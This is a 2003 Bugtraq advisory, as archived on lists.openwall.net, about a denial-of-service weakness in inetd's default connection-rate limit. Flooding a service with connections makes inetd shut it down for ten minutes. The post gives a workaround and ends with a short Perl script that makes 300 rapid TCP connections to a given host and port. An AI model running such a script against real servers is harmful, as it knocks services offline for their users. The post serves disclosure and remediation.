lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Sat, 6 Sep 2003 18:08:22 +0400
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: bugtraq@...urityfocus.com
Subject: 11 years of inetd default insecurity?


Dear bugtraq@...urityfocus.com,

Well,  we all blame Microsoft in insecure default configuration... Isn't
it time to clean outdated code in Unix?

I. Intro

Saint_Byte reported DoS vulnerability in wu-ftp. Small perl script (like
one  below) kills ftp service... With closer look we have good old inetd
feature   a  lot  of  existing  FreeBSD/linux  installations  are  still
vulnerable.  This  problem  is  known  since  ancient  time  [1] and was
discussed  again  and again, but still present. In fact, problem is well
known.  It's  just  another  rake everyone steps to. It's on any man and
FAQ, but may be it's time to resolve it? Because it's definitely a BUG.

II. Who is vulnerable

Any system shipped with network daemons launched through inetd (FreeBSD,
SuSE, Red Hat, etc.).

III. Details

Inetd has an option

     -R rate
             Specify the maximum number of times a service can be invoked in 
             one minute; the default is 256.  A rate of 0 allows an unlimited
             number of invocations.

The  problem  is,  remote attacker can establish as much connections per
minute  as  bandwidth allows... Now, guess how inetd reacts if more than
256 connections received in one minute? It will disable service for next
10   minutes   to  help attack to succeed. Of cause, this is documented.
Interval is not configurable.

something like

Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service terminated

will  appear  in  logs...  If  connection  is  closed by attacker before
service actually starts, IP address of attacker will never be logged.

IV. Workaround

-R 0 -s your_ad_can_be_here

or ask everyone to do not bother your server.

V. inetd-DoS-by-default-11-years-anniversary-super-exploit.pl
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/usr/bin/perl

use Socket;
$host=@...V[0];
$port=@...V[1];
if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";}
$iadr=inet_aton($host);
$padr=sockaddr_in($port,$iadr);
for($i=0; $i < 300; $i++)
{
 socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
 connect(SOCK,$padr) or next;
 close(SOCK);
}
print "\nDone\n";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

VI. References:

[1]Ari Luotonen, "www/tcp server failing (looping), service terminated"
http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html

-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ